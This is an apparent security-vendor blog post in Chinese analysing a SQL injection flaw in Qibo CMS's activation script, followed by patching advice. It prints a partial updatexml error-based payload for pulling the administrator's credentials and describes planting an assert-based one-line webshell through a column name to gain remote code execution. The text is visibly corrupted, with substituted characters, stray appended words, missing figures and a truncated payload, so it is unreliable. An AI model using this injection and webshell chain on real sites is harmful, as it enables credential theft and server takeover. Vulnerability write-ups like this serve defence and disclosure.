齐博cms整站系统,是目前建站系统用的较多的一款CMS系统,开源,免费,第三方扩展化,界面可视化的操做,使用简单,便于新手使用和第二次开发,受到许多站长们的喜欢。开发架构使用的是php语言以及mysql数据库,强大的网站并发能力。于近日,咱们SINE安全公司发现齐博cms又爆出高危的sql注入漏洞,关于该网站漏洞的详情,咱们来详细的分析漏洞的产生以及如何利用。php
在对整个网站代码的漏洞检测中发现do目录下的activate.php存在能够插入恶意参数的变量值,咱们来看下这个代码:前端
齐博cms漏洞详情:mysql
从代码里发现这个代码的功能是发送序列号激活的一个功能,从激活的连接地址里,能够看出do/activate.php?job=activate&safe_id=$safe_id 是用来激活序列号的,咱们从整个齐博的代码里找到了帐号激活的一个大致的过程,首先会注册一个帐号,注册帐号后会须要发送邮件到用户的邮箱里,邮箱里验证的是safe_id这个值,这个safe_id这个值通过md5的解密后直接生成uaername跟用户的密码,而后再传入到get_safe()这个函数,在这个inc文件夹下的class.user.php代码里找获得这个函数。sql
咱们发现这个get_safe()函数是用来传递用户的激活信息,并进行安全过滤与判断的,从这里咱们能够插入恶意的sql语句到网站后端里去,并直接到数据库中执行该语句,咱们本地来测试一下是否能够sql注入:数据库
从上图咱们能够看出能够进行网站sql注入攻击,那么咱们就能够进行查询数据库的帐号密码操做,好比查询网站超级管理员的帐号密码:and (updatexml(1,concat(0x7e,(substring((selectusername from qb_memberdata where groupid=3),1, 这个语句就是查询超级管理员的帐号密码,经过这里咱们查到网站的管理员帐号密码,登陆后台,咱们进行远程代码提权了。后端
增长栏目为${assert($_POST[safe])},一句话后门的代码会直接写入到/data/guide_fid.php文件,用一句话木马链接工具链接便可。安全
关于齐博cms漏洞的修复,咱们SINE安全建议网站的运用者,尽快升级齐博CMS到最新版本,对于sql注入语句进行安全过滤与sql注入防御,对网站的后台默认地址进行详细的更改成其余的文件名。对于前端网站进行sql语句查询的时候进行网站安全白名单系统部署,网站后台的帐号密码设置的复杂一些,尽量的用数字+大小写+特殊字符组合。架构